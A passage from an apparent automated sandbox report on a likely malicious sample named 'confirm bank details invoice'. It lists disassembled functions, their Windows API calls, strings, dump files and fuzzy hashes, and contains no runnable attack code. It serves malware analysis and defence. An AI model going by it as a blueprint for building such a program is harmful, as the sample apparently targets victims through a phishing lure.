                    • Instruction Fuzzy Hash: 72D1C131A04105DBCB109F6AC485BEEB7B5BF04700F18845BE5159B281DB78EC65DBBA
                    Function 004D716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 004D71FC
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004D7247
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: 60a27181bc177b2f66fcf92f2fe6d939c819fb6ea7898c311e0addd944f088ad
                    • Instruction ID: 8b02e241c4c2adc3d3d82137b597020baa80529be4bde69492112215ba16c2c8
                    • Opcode Fuzzy Hash: 60a27181bc177b2f66fcf92f2fe6d939c819fb6ea7898c311e0addd944f088ad
                    • Instruction Fuzzy Hash: E1913E346086419BCB05EF11C491A6EBBA1BF55318F00885FFC9A5B393DB38ED46CB99
                    Function 004ACB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                    Download Yara Rule
                    APIs
                    • EnumChildWindows.USER32(?,004ACF50), ref: 004ACE90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: 4+R$CLASS$CLASSNN$H+R$INSTANCE$L+R$NAME$P+R$REGEXPCLASS$T+R$TEXT
                    • API String ID: 3555792229-2236777132
                    • Opcode ID: 109b8ab422950ded6e969c399c5b83cd3561e8302bc833092e6e892ad79f2c71
                    • Instruction ID: dc377302aa681af9824ba358c83dc9f9f9a6d722fa6ae5babbb328f3e0b15a80
                    • Opcode Fuzzy Hash: 109b8ab422950ded6e969c399c5b83cd3561e8302bc833092e6e892ad79f2c71
                    • Instruction Fuzzy Hash: 9791A330900506ABDB58EF61C4C1BEBFBB5BF16304F50851BD449A7291DF38695AC7E8
                    Function 004DE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004DE5AB
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004DBEAF), ref: 004DE607
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004DE647
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004DE68C
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004DE6C3
                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,004DBEAF), ref: 004DE6CF
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004DE6DF
                    • DestroyIcon.USER32(?,?,?,?,?,004DBEAF), ref: 004DE6EE
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004DE70B
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004DE717
                      • Part of subcall function 00490FA7: __wcsicmp_l.LIBCMT ref: 00491030
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 1212759294-1154884017
                    • Opcode ID: 951ccba9af6c5416c6cf62432b995b82b4461d40c4aa4234771e109eec42284e
                    • Instruction ID: c2c6e9ca0dcbe67d5b9460f00a8f930b2bc5c9b365ce407a880bb4ddb6a9e6b6
                    • Opcode Fuzzy Hash: 951ccba9af6c5416c6cf62432b995b82b4461d40c4aa4234771e109eec42284e
                    • Instruction Fuzzy Hash: AB61D071900215BAEB14EF65CC52FBE7BA8BB08714F104117F915DA2D0EB78D990CB68
                    Function 004BD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • CharLowerBuffW.USER32(?,?), ref: 004BD292
                    • GetDriveTypeW.KERNEL32 ref: 004BD2DF
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004BD327
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004BD35E
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004BD38C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 1148790751-4113822522
                    • Opcode ID: b465b8926753d12975c5c4d5d2aba6ecc35dc4fda4ce14c6ee665361c9046bfc
                    • Instruction ID: f9a5065fced3058ae8c3b70fa832dd90b56177f191cb26ad000db76ab86ab97d
                    • Opcode Fuzzy Hash: b465b8926753d12975c5c4d5d2aba6ecc35dc4fda4ce14c6ee665361c9046bfc
                    • Instruction Fuzzy Hash: 1D516D715047049FC700EF11D8819AEB7E5FF99718F00886EF88967291DB39EE06CB96
                    Function 004B26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,004E3973,00000016,0000138C,00000016,?,00000016,0050DDB4,00000000,?), ref: 004B26F1
                    • LoadStringW.USER32(00000000,?,004E3973,00000016), ref: 004B26FA
                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,004E3973,00000016,0000138C,00000016,?,00000016,0050DDB4,00000000,?,00000016), ref: 004B271C
                    • LoadStringW.USER32(00000000,?,004E3973,00000016), ref: 004B271F
                    • __swprintf.LIBCMT ref: 004B276F
                    • __swprintf.LIBCMT ref: 004B2780
                    • _wprintf.LIBCMT ref: 004B2829
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004B2840
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                    • API String ID: 618562835-2268648507
                    • Opcode ID: 721716dee0997fb61a9ac38399f5e930ead809b7031ed543b5d251feb62088df
                    • Instruction ID: 7465dea8e0e59044fed4710f326115892c0c2c21089ff7cd2b95d85b6b40f863
                    • Opcode Fuzzy Hash: 721716dee0997fb61a9ac38399f5e930ead809b7031ed543b5d251feb62088df
                    • Instruction Fuzzy Hash: 80417172800219BACB14FBD1DE82DEEB778EF15348F50446EB50576092DB786F09CBA8
                    Function 004BD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004BD0D8
                    • __swprintf.LIBCMT ref: 004BD0FA
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 004BD137
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004BD15C
                    • _memset.LIBCMT ref: 004BD17B
                    • _wcsncpy.LIBCMT ref: 004BD1B7
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004BD1EC
                    • CloseHandle.KERNEL32(00000000), ref: 004BD1F7
                    • RemoveDirectoryW.KERNEL32(?), ref: 004BD200
                    • CloseHandle.KERNEL32(00000000), ref: 004BD20A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: 07a3e164b6d055d510c4cd8f0ff01309e65754d82333c3b51c03cd6355342179
                    • Instruction ID: 7e4af3f02914fc5544549279a2a71eb5ed70174fdd4c28acc366bf616c3e6eee
                    • Opcode Fuzzy Hash: 07a3e164b6d055d510c4cd8f0ff01309e65754d82333c3b51c03cd6355342179
                    • Instruction Fuzzy Hash: 04318EB290010AABDB21DFA5DC49FEB37BDAF89704F1040FAF909D2160E77496558B38
                    Function 004DE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,004DBEF4,?,?), ref: 004DE754
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,004DBEF4,?,?,00000000,?), ref: 004DE76B
                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,004DBEF4,?,?,00000000,?), ref: 004DE776
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,004DBEF4,?,?,00000000,?), ref: 004DE783
                    • GlobalLock.KERNEL32(00000000), ref: 004DE78C
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004DBEF4,?,?,00000000,?), ref: 004DE79B
                    • GlobalUnlock.KERNEL32(00000000), ref: 004DE7A4
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,004DBEF4,?,?,00000000,?), ref: 004DE7AB
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004DBEF4,?,?,00000000,?), ref: 004DE7BC
                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,004FD9BC,?), ref: 004DE7D5
                    • GlobalFree.KERNEL32(00000000), ref: 004DE7E5
                    • GetObjectW.GDI32(00000000,00000018,?), ref: 004DE809
                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 004DE834
                    • DeleteObject.GDI32(00000000), ref: 004DE85C
                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004DE872
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                    • String ID:
                    • API String ID: 3840717409-0
                    • Opcode ID: 96b0e4f4940fe8109d5656012a93dced3252e114a7eb37a8fba5c3c1928f3372
                    • Instruction ID: 66e248685489436d9468ab7f5bc6aa2ca0997f6bd1f99ecd8ed03b69822da44b
                    • Opcode Fuzzy Hash: 96b0e4f4940fe8109d5656012a93dced3252e114a7eb37a8fba5c3c1928f3372
                    • Instruction Fuzzy Hash: B3414975A00204EFDB11AF65CC88EAF7BBAEF89715F104069F906DB2A0C7349951DB64
                    Function 004C05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                    Download Yara Rule
                    APIs
                    • __wsplitpath.LIBCMT ref: 004C076F
                    • _wcscat.LIBCMT ref: 004C0787
                    • _wcscat.LIBCMT ref: 004C0799
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004C07AE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C07C2
                    • GetFileAttributesW.KERNEL32(?), ref: 004C07DA
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 004C07F4
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C0806
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                    • String ID: *.*
                    • API String ID: 34673085-438819550
                    • Opcode ID: b04d8c39aec038c2ad2e1c75788a0ba59bca94d93353ffb525f81311dfca258e
                    • Instruction ID: 256ce6c4302a6755781ff85d4b0fa33ba37de7b76564d27fa35383080705dc73
                    • Opcode Fuzzy Hash: b04d8c39aec038c2ad2e1c75788a0ba59bca94d93353ffb525f81311dfca258e
                    • Instruction Fuzzy Hash: 28817075604301DFCBA4EF64C445E6FB7E8AB88314F14882FF889C7251E738E9558B9A
                    Function 004DEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004DEF3B
                    • GetFocus.USER32 ref: 004DEF4B
                    • GetDlgCtrlID.USER32(00000000), ref: 004DEF56
                    • _memset.LIBCMT ref: 004DF081
                    • GetMenuItemInfoW.USER32 ref: 004DF0AC
                    • GetMenuItemCount.USER32(00000000), ref: 004DF0CC
                    • GetMenuItemID.USER32(?,00000000), ref: 004DF0DF
                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 004DF113
                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 004DF15B
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004DF193
                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 004DF1C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                    • String ID: 0
                    • API String ID: 1296962147-4108050209
                    • Opcode ID: 3b3cc416460b1ed039c4cc5c016540de8f6e217699805749a81ad295aaf1f3e5
                    • Instruction ID: 5c8e519bb7f2d2ae08db06a7ddb27ca2e0ec1bd2770194bd4b4561de49f6e573
                    • Opcode Fuzzy Hash: 3b3cc416460b1ed039c4cc5c016540de8f6e217699805749a81ad295aaf1f3e5
                    • Instruction Fuzzy Hash: 03814670504301AFDB20DF25C894A6FBBE9BB88318F00492FF99697391D734D909CB9A
                    Function 004AA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004AABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004AABD7
                      • Part of subcall function 004AABBB: GetLastError.KERNEL32(?,004AA69F,?,?,?), ref: 004AABE1
                      • Part of subcall function 004AABBB: GetProcessHeap.KERNEL32(00000008,?,?,004AA69F,?,?,?), ref: 004AABF0
                      • Part of subcall function 004AABBB: HeapAlloc.KERNEL32(00000000,?,004AA69F,?,?,?), ref: 004AABF7
                      • Part of subcall function 004AABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004AAC0E
                      • Part of subcall function 004AAC56: GetProcessHeap.KERNEL32(00000008,004AA6B5,00000000,00000000,?,004AA6B5,?), ref: 004AAC62
                      • Part of subcall function 004AAC56: HeapAlloc.KERNEL32(00000000,?,004AA6B5,?), ref: 004AAC69
                      • Part of subcall function 004AAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004AA6B5,?), ref: 004AAC7A
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004AA8CB
                    • _memset.LIBCMT ref: 004AA8E0
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004AA8FF
                    • GetLengthSid.ADVAPI32(?), ref: 004AA910
                    • GetAce.ADVAPI32(?,00000000,?), ref: 004AA94D
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004AA969
                    • GetLengthSid.ADVAPI32(?), ref: 004AA986
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004AA995
                    • HeapAlloc.KERNEL32(00000000), ref: 004AA99C
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004AA9BD
                    • CopySid.ADVAPI32(00000000), ref: 004AA9C4
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004AA9F5
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004AAA1B
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004AAA2F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: a998618aafe4419178c62acde79633beb718fc9d1ed2689f0f2a81af5fe0d4f4
                    • Instruction ID: d725828c861e6dd74fbec0a30e832c60b17828f403f885ae892d25d755da2f95
                    • Opcode Fuzzy Hash: a998618aafe4419178c62acde79633beb718fc9d1ed2689f0f2a81af5fe0d4f4
                    • Instruction Fuzzy Hash: 21517075900109AFDF00DF91DD44EEEBBBAFF15304F04812AF911A7290DB389A25CB65
                    Function 004C9DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32(00000000), ref: 004C9E36
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 004C9E42
                    • CreateCompatibleDC.GDI32(?), ref: 004C9E4E
                    • SelectObject.GDI32(00000000,?), ref: 004C9E5B
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 004C9EAF
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 004C9EEB
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 004C9F0F
                    • SelectObject.GDI32(00000006,?), ref: 004C9F17
                    • DeleteObject.GDI32(?), ref: 004C9F20
                    • DeleteDC.GDI32(00000006), ref: 004C9F27
                    • ReleaseDC.USER32(00000000,?), ref: 004C9F32
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: 61c2d89923c842f898d691a7a92de63d0c9c2c89e9b332c6fb910ac1cf9ae87c
                    • Instruction ID: cace629eb48902700f48374827e02262b2ce18db647505944b83790f7e286c0b
                    • Opcode Fuzzy Hash: 61c2d89923c842f898d691a7a92de63d0c9c2c89e9b332c6fb910ac1cf9ae87c
                    • Instruction Fuzzy Hash: 53513B75900309EFCB14CFA8C889EAEBBB9EF48710F14842EF95997250C735AD41CB58
                    Function 004BCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                    • API String ID: 2889450990-2391861430
                    • Opcode ID: ce7da5269d1dbecb3326f8010e30e7f06dc8ad77c2d87b46939868b74561b8d8
                    • Instruction ID: eed000d30828e88dcc4c91c22988a620a90634595f06fde42474f9c8fdc362bd
                    • Opcode Fuzzy Hash: ce7da5269d1dbecb3326f8010e30e7f06dc8ad77c2d87b46939868b74561b8d8
                    • Instruction Fuzzy Hash: 0A51A331800109ABCF14EBE1DD86EEEB778EF05308F10416AF405761A1EB786F59DB68
                    Function 004BCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                    • API String ID: 2889450990-3420473620
                    • Opcode ID: 22f47dd45f536287f968969cd78deadb9a8c6197f7812460d6b47bf266a29a93
                    • Instruction ID: 575dd487aaf21bec7f85bc4d90a15f41ac1f7fc9f61fc1b17f020f534d8820ed
                    • Opcode Fuzzy Hash: 22f47dd45f536287f968969cd78deadb9a8c6197f7812460d6b47bf266a29a93
                    • Instruction Fuzzy Hash: 8F51A431800519AACF14EBE1DD86EEEBB78EF15304F10406AB109721A2DB786F59DF69
                    Function 004D3C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,004D2BB5,?,?), ref: 004D3C1D
                    Strings
                    Memory Dump Source
